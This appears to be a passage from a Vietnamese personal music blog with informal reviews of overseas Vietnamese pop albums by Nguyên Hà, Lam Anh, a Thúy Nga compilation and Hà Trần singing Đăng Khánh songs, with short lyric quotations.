Lạ lùng nhất theo mình, trong album này, bài mà Quang Dũng hát có những khúc nghe “tạm” nhất lại là bài “Nghìn trùng xa cách”. Nói chung phí thời gian nghe

Nguyên Hà – Địa đàng

Nguyên Hà - Địa đàng

Nguyên Hà – Địa đàng

Album thứ 10 của Quốc Bảo, được làm trong thời gian 2 năm. Nguyên Hà là một giọng ca được Quốc Bảo phát hiện, không chuyên nghiệp, không trường lớp nhưng giọng hát trong trẻo, vô tư mà cảm xúc đến lạ.

Trên blog của mình, Quốc Bảo cũng xem đây là album ngọt và dịu nhất của mình, có thể sánh ngang hay hơn cả Ngồi hát ca bềnh bồng hay Bình yên năm nào.

Cảm nhận riêng của em khi nghe album này thì không thấy đọng lại chút gì đó bâng khuâng như ngày đó từng nghe Bài tình cho giai nhân hay Tàn phai, Tình ca, Em về tóc xanh… của Quốc Bảo. Vẫn là những giai điệu nhẹ nhàng êm dịu thường thấy, vẫn là những ngôn từ nắn nót, hoa mỹ đến kinh người của Quốc Bảo, nhưng đơn giản là em không cảm thấy gì.

Cũng có thể i’m not in the right mood, sau có thời gian chắc sẽ nghe lại xem thử. Em giới thiệu đây để bác nào thích nhạc Quốc Bảo và muốn tìm gì đó trong trẻo, nhẹ nhàng nghe thì nghe thử, em nghĩ sẽ có cảm nhận khác em.

Lam Anh – Về lại cõi sầu

Lam Anh - Về lại cõi sầu

Lam Anh – Về lại cõi sầu

Về lại cõi sầu – Album mới nhất và (hình như) là album thứ 2 của Lam Anh do Thúy Nga Paris By Night phát hành.

Trong số các ca sĩ trẻ của làng nhạc hải ngoại vài năm trở lại đây thì Lam Anh vụt lên như một trong số các tên hứa hẹn nhất. Lam Anh xuất hiện lần đầu tiên trên sân khấu Paris By Night 96 với bài song ca cùng Quỳnh Vi. Cô bắt đầu được chú ý hơn dần qua các chương trình sau đó, đặc biệt là khi cô trình bày bản ‘Cho em quên tuổi ngọc’ của nhạc sĩ Lam Phương (PBN 102), và lên tới đỉnh điểm là bản song ca ‘Nơi tình yêu bắt đầu’ với Bằng Kiều (PBN 104).

Giọng hát của Lam Anh không hẳn là xuất sắc lắm, chỉ vừa đủ, có thể lên vừa đủ, cảm xúc trong giọng hát cũng vừa đủ, nhưng nhờ ngoại hình dễ nhìn cùng cách biểu diễn rất “hợp” sân khấu, Lam Anh ngày càng được yêu mến trong cộng đồng hải ngoại.

Lam Anh rất giống Minh Tuyết ở nhiều điểm, từ cách diễn trên sân khấu đến việc chọn bài hát. Đó là những bài không quá khó hát và khó nghe, nhưng cũng không hẳn là dễ dãi. Điều này có thể thấy qua các bài trong album ‘Về lại cõi sầu’ này của Lam Anh. Giống như vô vàn các album của những ca sĩ trẻ được Thúy Nga phát hành, ‘Về lại cõi sầu’ không tạp nham và nhảm nhí, vớ vẩn như các album nhạc thị trường đang tràn ngập, cũng không hẳn là một tác phẩm nghệ thuật đích thực – như các đĩa của những giọng ca huyền thoại khác.

Nghe ‘Về lại cõi sầu’ nhìn chung cũng được, thấy một Lam Anh vượt trội so với các ca sĩ trẻ cùng tuổi trong lẫn ngoài nước, nhưng nghe bài ‘Nếu em được lựa chọn’ thì thấy Lam Anh còn một con đường khá xa để ít nhất đạt đến được như Minh Tuyết hiện tại.

TNCD 528 – Ảo giác

TNCD Ảo giác

Đang nghe cái này nà. Nói chung mình ít thích nghe các album Top Hits của Thúy Nga hay Asia vì thường chẳng có chủ đề nào cả, nhưng album này nghe được.

Ngoài các giọng ca của Ngọc Anh (Nha Trang ngày về), Bằng Kiều (Chỉ còn lại tình yêu), mình khá bất ngờ với Cô gái đến từ hôm qua của Lam Anh, đặc biệt là 2 giọng ca Đình Bảo và Thiên Tôn.

Thiên Tôn đoạt giải nhất trong cuộc tuyển chọn ca sĩ gần đây trong V-Star, được xem là thế hệ nam ca sĩ trẻ tiềm năng của làng nhạc hải ngoại. Nhiều người mong chờ anh tiếp tục phát triển như cách mà Trần Thái Hòa làm được. Mình thấy ảnh trong các chương trình PBN, từ hát các ca khúc của Ngô Thụy Miên đến Nhật Trường đến Trịnh Công Sơn chỉ bình thường, không có gì quá đặc sắc, dưng mà chắc nhờ công nghệ thu âm, trong đĩa này ảnh hát được phết.

Đình Bảo nếu như mình không nhầm thì là một trong những giọng hát đỉnh từ thời còn ở AC&M, sau khi đi du học bên Mỹ thì bắt đầu xuất hiện trên PBN. He he còn nếu tình cờ trùng tên mà là anh Đình Bảo khác thì mình chịu. Khá bất ngờ với bài Tình Cầm và Dư Âm mà anh trình bày trong album này, nghe đẳng cấp hẳn, còn thích hơn cả Bằng Kiều hay Trần Thái Hòa.

Bài mình thích nhất là “Chỉ chừng đó thôi” của Don Hồ. Không thích cách phối trong bài “Nha Trang ngày về” mà Ngọc Anh hát, nhưng do bản thân bài hát hay và giọng Ngọc Anh đầy nội lực nên nghe cũng được lắm đó.

Đăng Khánh – Lệ buồn nhớ mi

Album này hình như được tung ra tầm nửa năm trước, đến bây giờ tôi mới phát hiện ra trong dịp khá tình cờ. Cứ như một thói quen mà tôi chả nhớ bắt đầu từ khi nào, cứ đúng dịp 30-4, tôi lại đọc thơ Du Tử Lê. Nói ra thì rườm rà, nên tôi bỏ qua, nhưng tóm lại là cuối cùng tôi dừng ở bài “Lệ buồn Nhớ mi” do Tuấn Ngọc trình bày. Bài này của nhạc sĩ Đăng Khánh, một tên tuổi chẳng có gì (quả thật thế) nổi bật, lời bài này thoáng nghe quá cũng không gây được ấn tượng mạnh đến day dứt như các bài thơ khác của Du Tử Lê. Tuy nhiên, lần này lò mò làm sao, tôi lại tìm được album này của Trần Thu Hà.

Người ta có thể tranh cãi về việc dùng chữ diva cho Hà Trần có xứng đáng hay không, nhưng không thể phủ nhận trong làng nhạc nhẹ Việt Nam hiện tại, Hà Trần là một trong những cái tên sáng giá nhất. Tuy giọng của Hà khá mỏng, không dồi dào đầy nội lực như Thanh Lam, cũng không có những nét cá tính rất riêng kiểu Bống như Hồng Nhung, nhưng ở Hà Trần có cái khôn khéo và rất tinh tế của một người nghệ sĩ đầy kinh nghiệm và kĩ thuật được rèn luyện qua trường lớp. Giọng hát có thể đẹp vì sự mộc mạc, cũng có thể đẹp vì kĩ thuật thanh nhạc. Vì vậy, ngay khi thấy album này, tôi có cảm giác muốn thử nghe ngay lập tức.

Và tôi đã không bị thất vọng.

Bỏ qua những bài xen kẽ của Nguyên Khang, Quang Dũng (*em xin lỗi, nhưng em ghét anh vãi, anh Dũng à), nghĩa là nếu chỉ nghe các bài số lẻ của Hà Trần 1, 3, 5, 7, 9 thì không bài nào không hay. Nếu mà cái tên Đăng Khánh nổi tiếng hơn xíu nữa, ắt có khi sau này khi nhìn lại sự nghiệp của Hà Trần, người ta sẽ xem một hay hai bài này như là những bài Hà hát hay nhất.

Bài “Lệ buồn Nhớ mi” – một bài chất nhạc nhẹ nhưng khó hát, Hà Trần hát hay hơn cả Tuấn Ngọc, giọng Hà vọt từ những nốt khá trầm ở đầu bài hát, lên tới những nốt nghe buôn buốt cao vút, dần đến sự thổn thức nghẹn ngào khúc cuối bài khi cô thảng thốt:

hỏi sông núi cũ
giữa mùa thu em nhớ gì?
giữa mùa thu em nhớ gì?

Đúng là nhạc phổ từ thơ của Du Tử Lê phải hát như thế này mới đúng.

Dĩ nhiên, album không chỉ có bài “Lệ buồn Nhớ mi”, những bài khác của Hà Trần, như bài được xem là sáng tác ưng ý nhất của Đăng Khánh “Sài Gòn buồn cho riêng ai?” và đặc biệt là một bài nữa tôi rất thích “Đừng gọi tên em nữa”:

Đừng gọi tên em nữa
Đừng gọi tên em nữa
Kệ em khóc lẻ loi
Chiều ơi muộn lắm rồi
Đừng gọi tên em nữa
Lòng người như giông tố
Bóng đêm vẫn buông dài
Hắt hiu mưa bên ngoài
Xóa đi bao ưu hoài
Đừng gợi nữa tình ơi…

nghe như thắt cả ruột lại.

Nói chung trừ mấy bài xen vào của mấy tay nam ca sĩ thì tôi hoàn toàn về album này. Lâu rồi mới tìm được album ưng ý thế. :-d

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.